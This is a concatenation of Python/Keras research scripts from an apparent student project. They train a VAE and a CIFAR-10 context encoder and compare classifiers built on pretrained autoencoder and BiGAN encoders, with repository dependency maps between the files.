    epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
                              mean=0., stddev=epsilon_std)
    return z_mean + K.exp(z_log_var / 2) * epsilon
# Define VAE model
x = Input(shape=img_shape)
z_mean, z_log_var = encoder(x)
# Reparameterized sampling wrapped in a Lambda layer so it stays differentiable
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
recon_x = generator(z)
vae = Model(x, recon_x)
# Define VAE loss and compile model
# Reconstruction term: mean per-pixel binary cross-entropy scaled by pixel count
xent_loss = np.prod(img_shape) * K.mean(metrics.binary_crossentropy(x, recon_x))
# KL term: divergence of the approximate posterior from the standard-normal prior
kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
vae_loss = K.mean(xent_loss + kl_loss)
vae.add_loss(vae_loss)
# Loss is attached via add_loss above, hence loss=None at compile time
vae.compile(optimizer='rmsprop', loss=None)
# =====================================
# Train models
# =====================================
# Specify training hyper-parameters
epochs = 50
batch_size = 128
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(filepath=model_path+'.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = vae.fit(X_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
callbacks=callbacks,
validation_split=1/12.)
# Replace current encoder and decoder models with that from the best save autoencoder
stochastic_encoder = vae_encoder_model()
encoder = vae_encoder_sampling_model(stochastic_encoder, latent_dim, img_shape, epsilon_std)
generator = generator_model()
vae = vae_model(encoder, generator, img_shape)
vae.load_weights(model_path + '.h5')
# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)
# Plot training curves
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,489 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_ce_train.py | from __future__ import print_function, division
from functions.data_funcs import get_mnist
from keras.layers import Input, Dense, Flatten, Dropout
from keras.layers import BatchNormalization, Activation
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
import matplotlib.pyplot as plt
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
mask_height = 8
mask_width = 8
channels = 3
img_shape = (img_rows, img_cols, channels)
missing_shape = (mask_height, mask_width, channels)
num_classes = 10
image_path = 'Images/cifar10_ce'
model_path = 'Models/cifar10_ce'
def sample_images(path, epoch, imgs):
    """Save a 3x6 grid (original / masked / inpainted) to '<path>_<epoch>.png'.

    Relies on the module-level `generator` model and `mask_randomly` helper.
    """
    r, c = 3, 6
    masked_imgs, missing_parts, (y1, y2, x1, x2) = mask_randomly(imgs)
    gen_missing = generator.predict(masked_imgs)
    # Rescale from [-1, 1] back to [0, 1] for plotting
    imgs = 0.5 * imgs + 0.5
    masked_imgs = 0.5 * masked_imgs + 0.5
    gen_missing = 0.5 * gen_missing + 0.5
    fig, axs = plt.subplots(r, c)
    for i in range(c):
        axs[0, i].imshow(imgs[i, :, :])
        axs[0, i].axis('off')
        axs[1, i].imshow(masked_imgs[i, :, :])
        axs[1, i].axis('off')
        # Paste the generated patch back into the original at the masked location
        filled_in = imgs[i].copy()
        filled_in[y1[i]:y2[i], x1[i]:x2[i], :] = gen_missing[i]
        axs[2, i].imshow(filled_in)
        axs[2, i].axis('off')
    fig.savefig(path + '_%d.png' % epoch)
    plt.close()
def generator_model():
    """Build the context-encoder generator: masked (32, 32, 3) image -> (8, 8, 3) patch."""
    model = Sequential()
    # Encoder: four stride-2 convolutions reduce 32x32 down to 2x2
    model.add(Conv2D(32, kernel_size=3, strides=2, input_shape=img_shape, padding="same"))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Conv2D(64, kernel_size=3, strides=2, padding="same"))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Conv2D(128, kernel_size=3, strides=2, padding="same"))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Conv2D(512, kernel_size=1, strides=2, padding="same"))
    model.add(LeakyReLU(alpha=0.2))
    model.add(Dropout(0.5))
    # Decoder: two upsamplings bring 2x2 up to 8x8, matching missing_shape
    model.add(UpSampling2D())
    model.add(Conv2D(128, kernel_size=3, padding="same"))
    model.add(Activation('relu'))
    model.add(BatchNormalization(momentum=0.8))
    model.add(UpSampling2D())
    model.add(Conv2D(64, kernel_size=3, padding="same"))
    model.add(Activation('relu'))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Conv2D(channels, kernel_size=3, padding="same"))
    # tanh output matches inputs preprocessed into [-1, 1]
    model.add(Activation('tanh'))
    masked_img = Input(shape=img_shape)
    gen_missing = model(masked_img)
    return Model(masked_img, gen_missing)
def discriminator_model():
    """Build the patch discriminator: (8, 8, 3) patch -> real/fake probability."""
    model = Sequential()
    model.add(Conv2D(64, kernel_size=3, strides=2, input_shape=missing_shape, padding="same"))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Conv2D(128, kernel_size=3, strides=2, padding="same"))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Conv2D(256, kernel_size=3, padding="same"))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Flatten())
    model.add(Dense(1, activation='sigmoid'))
    model.summary()
    img = Input(shape=missing_shape)
    validity = model(img)
    # Removed an unreachable `return model` that followed this return statement.
    return Model(img, validity)
def mask_randomly(imgs):
    """Zero out one random mask_height x mask_width patch in each image.

    Returns (masked_imgs, missing_parts, (y1, y2, x1, x2)) where the last
    element gives the per-image patch corner coordinates.
    Uses the module-level constants img_rows, mask_height, mask_width, channels.
    """
    count = imgs.shape[0]
    # Draw a random top-left corner per image (same call order as before,
    # so RNG consumption is unchanged)
    y1 = np.random.randint(0, img_rows - mask_height, count)
    y2 = y1 + mask_height
    x1 = np.random.randint(0, img_rows - mask_width, count)
    x2 = x1 + mask_width
    masked_imgs = np.empty_like(imgs)
    missing_parts = np.empty((count, mask_height, mask_width, channels))
    for idx, img in enumerate(imgs):
        clone = img.copy()
        top, bottom, left, right = y1[idx], y2[idx], x1[idx], x2[idx]
        missing_parts[idx] = clone[top:bottom, left:right, :].copy()
        clone[top:bottom, left:right, :] = 0
        masked_imgs[idx] = clone
    return masked_imgs, missing_parts, (y1, y2, x1, x2)
# =====================================
# Instantiate & compile models
# =====================================
# Instantiate models
generator = generator_model()
discriminator = discriminator_model()
# Specify optimizer for models
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=0.0002, beta_1=beta_1)
# Compile models
generator.compile(loss=['binary_crossentropy'], optimizer=optimizer)
discriminator.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])
# Define context encoder model
masked_img = Input(shape=img_shape)
gen_mask = generator(masked_img)
validity = discriminator(gen_mask)
# The combined model (stacked generator and discriminator) takes
# masked_img as input => generates missing image => determines validity
context_encoder = Model(masked_img, [gen_mask, validity])
discriminator.trainable = False
context_encoder.compile(loss=['mse', 'binary_crossentropy'],optimizer=optimizer)
# =====================================
# Load dataset
# =====================================
# Load CIFAR10 dataset
(X_train, y_train), (X_test, y_test) = get_mnist(gan=True)
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 100
batch_size = 128
epoch_save_interval = 5
num_batches = int(X_train.shape[0] / batch_size)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):

    # Print current epoch number
    print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))

    # Set epoch losses to zero
    d_epoch_loss_sum = 0
    g_epoch_loss_sum = 0
    d_acc = 0

    # Shuffle training set. np.random.permutation gives a true shuffle; the
    # previous np.random.randint sampled indices with replacement, which
    # duplicated some examples and dropped others each epoch.
    perm = np.random.permutation(X_train.shape[0])
    X_train = X_train[perm]

    # Train on all batches
    for batch in range(num_batches):

        # Labels for supervised training
        valid = np.ones((batch_size, 1))
        fake = np.zeros((batch_size, 1))

        # ---------------------
        #  Train Discriminator
        # ---------------------

        # Select next batch of images from training set and mask them
        imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
        masked_imgs, missing_piece, _ = mask_randomly(imgs)

        # Generate the missing patches for this batch
        gen_missing_piece = generator.predict(masked_imgs)

        # Train the discriminator on real and generated patches
        d_loss_real = discriminator.train_on_batch(missing_piece, valid)
        d_loss_fake = discriminator.train_on_batch(gen_missing_piece, fake)
        d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)

        # Record discriminator batch loss details
        d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
        d_epoch_loss_sum += d_loss[0]
        d_acc += d_loss[1]

        # ---------------------
        #  Train Generator
        # ---------------------

        # Train the generator (joint reconstruction + adversarial objective)
        g_loss = context_encoder.train_on_batch(masked_imgs, [missing_piece, valid])

        # Record generator batch loss. Previously these were never written,
        # leaving g_batch_loss_trajectory and g_epoch_loss_trajectory all zeros.
        g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss[0]
        g_epoch_loss_sum += g_loss[0]

        # Print progress
        print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
                                                                                      d_loss[0], 100 * d_loss[1], g_loss[0]))

    # Record epoch loss data
    d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
    g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
    d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)

    # If at save interval, save generated image samples
    if epoch % epoch_save_interval == 0:
        # Select a random half batch of images
        idx = np.random.randint(0, X_train.shape[0], 6)
        imgs = X_train[idx]
        sample_images(image_path, epoch, imgs)
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,490 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_classifier_comparison.py | import keras
import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from cifar10_models import deterministic_encoder_model, vae_encoder_model
from common_models.classifier_models import classifier_e_trainable_model, classifier_e_frozen_model
from common_models.common_models import vae_encoder_sampling_model
from functions.data_funcs import get_cifar10
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
model_path = 'Models/cifar10'
results_path = 'Results/cifar10'
# =====================================
# Load data
# =====================================
# Load pre-processed CIFAR10 data
(X_train, y_train), (X_test, y_test) = get_cifar10()
# Label data is same for both
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)
# =====================================
# Instantiate models
# =====================================
# Load encoders
basic_ae = deterministic_encoder_model()
dae = deterministic_encoder_model()
aae = deterministic_encoder_model()
vae_encoder = vae_encoder_model()
bigan = deterministic_encoder_model()
# Load saved weights
basic_ae.load_weights(model_path + '_basic_ae_encoder.h5')
dae.load_weights(model_path + '_dae_encoder.h5')
aae.load_weights(model_path + '_aae_encoder.h5')
vae_encoder.load_weights(model_path + '_vae_encoder.h5')
vae = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, 0.05)
bigan.load_weights(model_path + '_bigan_determ_encoder.h5')
# Freeze the parameters of all encoders
basic_ae.trainable = False
dae.trainable = False
aae.trainable = False
vae.trainable = False
bigan.trainable = False
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 100
batch_size = 128
val_split = 1/5.
patience = 10
# Specify optimizer for classifier training
optimizer = keras.optimizers.Adadelta()
# Specify training stop criterion
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
# Number of labelled examples to investigate
num_unlabelled = [100, 200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]
# Number of random initializations of FC layers for each value in num_unlabelled
num_initializations = 5
# Arrays to hold accuracy of classifiers
classifier1_acc = np.zeros(len(num_unlabelled))
classifier2_acc = np.zeros(len(num_unlabelled))
classifier3_acc = np.zeros(len(num_unlabelled))
classifier4_acc = np.zeros(len(num_unlabelled))
classifier5_acc = np.zeros(len(num_unlabelled))
classifier6_acc = np.zeros(len(num_unlabelled))
# Train classifiers for each number of unlabeled examples
for index, num in enumerate(num_unlabelled):
# Reset classifier scores to zero
classifier1_score = 0
classifier2_score = 0
classifier3_score = 0
classifier4_score = 0
classifier5_score = 0
classifier6_score = 0
# Reduce size of training sets
reduced_x_train = X_train[0:num, :, :, :]
reduced_y_train = y_train_one_hot[0:num, :]
# Average classification accuracy over num_iterations readings
for initialization in range(num_initializations):
# Print details of no. of labelled examples and iteration number
print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(initialization+1) + '/' + str(num_initializations))
# Instantiate classfiers to be trained
classifier1 = classifier_e_frozen_model(basic_ae)
classifier2 = classifier_e_frozen_model(dae)
classifier3 = classifier_e_frozen_model(aae)
classifier4 = classifier_e_frozen_model(vae)
classifier5 = classifier_e_frozen_model(bigan)
cnn = deterministic_encoder_model()
classifier6 = classifier_e_trainable_model(cnn)
# Compile models
for classifier in (classifier1, classifier2, classifier3, classifier4, classifier5, classifier6):
classifier.compile(loss=keras.losses.categorical_crossentropy,
optimizer=optimizer,
metrics=['accuracy'])
# =====================================
# Train classifiers
# =====================================
# Classifier 1
model_checkpoint = ModelCheckpoint(model_path + '_classifier_1.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier1.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier1.load_weights(model_path + '_classifier_1.h5')
score = classifier1.evaluate(X_test, y_test_one_hot, verbose=0)
classifier1_score += score[1]
# Classifier 2
model_checkpoint = ModelCheckpoint(model_path + '_classifier_2.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier2.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier2.load_weights(model_path + '_classifier_2.h5')
score = classifier2.evaluate(X_test, y_test_one_hot, verbose=0)
classifier2_score += score[1]
# Classifier 3
model_checkpoint = ModelCheckpoint(model_path + '_classifier_3.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier3.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier3.load_weights(model_path + '_classifier_3.h5')
score = classifier3.evaluate(X_test, y_test_one_hot, verbose=0)
classifier3_score += score[1]
# Classifier 4
model_checkpoint = ModelCheckpoint(model_path + '_classifier_4.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier4.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier4.load_weights(model_path + '_classifier_4.h5')
score = classifier4.evaluate(X_test, y_test_one_hot, verbose=0)
classifier4_score += score[1]
# Classifier 5
model_checkpoint = ModelCheckpoint(model_path + '_classifier_5.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier5.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier5.load_weights(model_path + '_classifier_5.h5')
score = classifier5.evaluate(X_test, y_test_one_hot, verbose=0)
classifier5_score += score[1]
# Classifier 6
model_checkpoint = ModelCheckpoint(model_path + '_classifier_6.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
classifier6.fit(reduced_x_train, reduced_y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
shuffle=True,
callbacks=callbacks,
validation_split=val_split)
classifier6.load_weights(model_path + '_classifier_6.h5')
score = classifier6.evaluate(X_test, y_test_one_hot, verbose=0)
classifier6_score += score[1]
# Record average classification accuracy for each no. of labelled examples
classifier1_acc[index] = 100 * classifier1_score / num_initializations
classifier2_acc[index] = 100 * classifier2_score / num_initializations
classifier3_acc[index] = 100 * classifier3_score / num_initializations
classifier4_acc[index] = 100 * classifier4_score / num_initializations
classifier5_acc[index] = 100 * classifier5_score / num_initializations
classifier6_acc[index] = 100 * classifier6_score / num_initializations
# Save results for all classifiers to file
np.savetxt('Results/classifier1.txt', classifier1_acc, fmt='%f')
np.savetxt('Results/classifier2.txt', classifier2_acc, fmt='%f')
np.savetxt('Results/classifier3.txt', classifier3_acc, fmt='%f')
np.savetxt('Results/classifier4.txt', classifier4_acc, fmt='%f')
np.savetxt('Results/classifier5.txt', classifier5_acc, fmt='%f')
np.savetxt('Results/classifier6.txt', classifier6_acc, fmt='%f')
# Print accuracies
print(classifier1_acc)
print(classifier2_acc)
print(classifier3_acc)
print(classifier4_acc)
print(classifier5_acc)
print(classifier6_acc) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,491 | davidhayes3/ME-Project | refs/heads/master | /semi_supervised/augmentation/cifar10_bigan_aug_comparison.py | import keras
from keras import backend as K
import numpy as np
import matplotlib.pyplot as plt
from common_models.classifier_models import classifier_e_frozen_model, classifier_e_trainable_model
from train_models.cifar10_cnn.cifar10_models import deterministic_encoder_model
from functions.data_funcs import get_cifar10
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
# Number of labelled examples to investigate
num_unlabelled = [200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]
num_iterations = 5
num_classes = 10
# Path that containes pre-trained encoder
pretrained_encoder_path = 'cifar10_bigan_determ_encoder.h5'
# Paths to hold classifier models
classifier_pretrained_path = 'cifar10_pretrained_classifier.h5'
classifier_pretrained_aug_path = 'cifar10_pretrained_aug_classifier.h5'
classifier_random_path = 'cifar10_random.h5'
classifier_random_aug_path = 'cifar10_random_aug.h5'
# =====================================
# Load data
# =====================================
(X_train, y_train), (X_test, y_test) = get_cifar10()
y_train_one_hot = keras.utils.to_categorical(y_train, num_classes)
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
# =====================================
# Define augmentation
# =====================================
datagen = ImageDataGenerator(rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
# =====================================
# Instantiate models
# =====================================
# Load frozen pretrained encoder model
pretrained_e = deterministic_encoder_model()
pretrained_e_one_layer_trainable = deterministic_encoder_model()
pretrained_e_trainable = deterministic_encoder_model()
# Load weights
pretrained_e.load_weights(pretrained_encoder_path)
# =====================================
# Training details
# =====================================
# Hyper-parameters and training specification for both models
epochs = 100
aug_epochs = 50
batch_size = 128
val_split = 1/5.
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
# Arrays to hold accuracy of classifiers
classifier_pretrained_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_aug_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_lastconv_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_lastconv_aug_acc = np.zeros(len(num_unlabelled))
classifier_random_acc = np.zeros(len(num_unlabelled))
classifier_random_aug_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_trainable_acc = np.zeros(len(num_unlabelled))
classifier_pretrained_trainable_aug_acc = np.zeros(len(num_unlabelled))
# =====================================
# Train models
# =====================================
# Loop through each quantity of enquiry
for index, num in enumerate(num_unlabelled):
# Set each score to zero
pretrained_score = 0
pretrained_aug_score = 0
pretrained_lastconv_score = 0
pretrained_lastconv_aug_score = 0
random_score = 0
random_aug_score = 0
pretrained_trainable_score = 0
pretrained_trainable_aug_score = 0
# Reduce size of training sets
reduced_x_train = X_train[0:num, :, :, :]
reduced_y_train = y_train_one_hot[0:num, :]
# fit the dataget
datagen.fit(reduced_x_train)
# Average classification accuracy a number of random initializations
for iteration in range(num_iterations):
# Print details of no. of labelled examples and iteration number
print('Labelled Examples: ' + str(num) + ', Iteration: ' + str(iteration+1) + '/' + str(num_iterations))
# ----------------------------
# Instantiate classifiers
# ----------------------------
# Classifiers with encoder learned from autoencoder and frozen
classifier_pretrained = classifier_e_frozen_model(pretrained_e)
classifier_pretrained_aug = classifier_e_frozen_model(pretrained_e)
# Classifiers with encoder learned from autoencoder and frozen (except last conv layer)
pretrained_e_one_layer_trainable.load_weights(pretrained_encoder_path)
# Set all layers to be non-trainable except last conv
classifier_pretrained_lastconv = classifier_e_trainable_model(pretrained_e_one_layer_trainable)
classifier_pretrained_lastconv_aug = classifier_e_trainable_model(pretrained_e_one_layer_trainable)
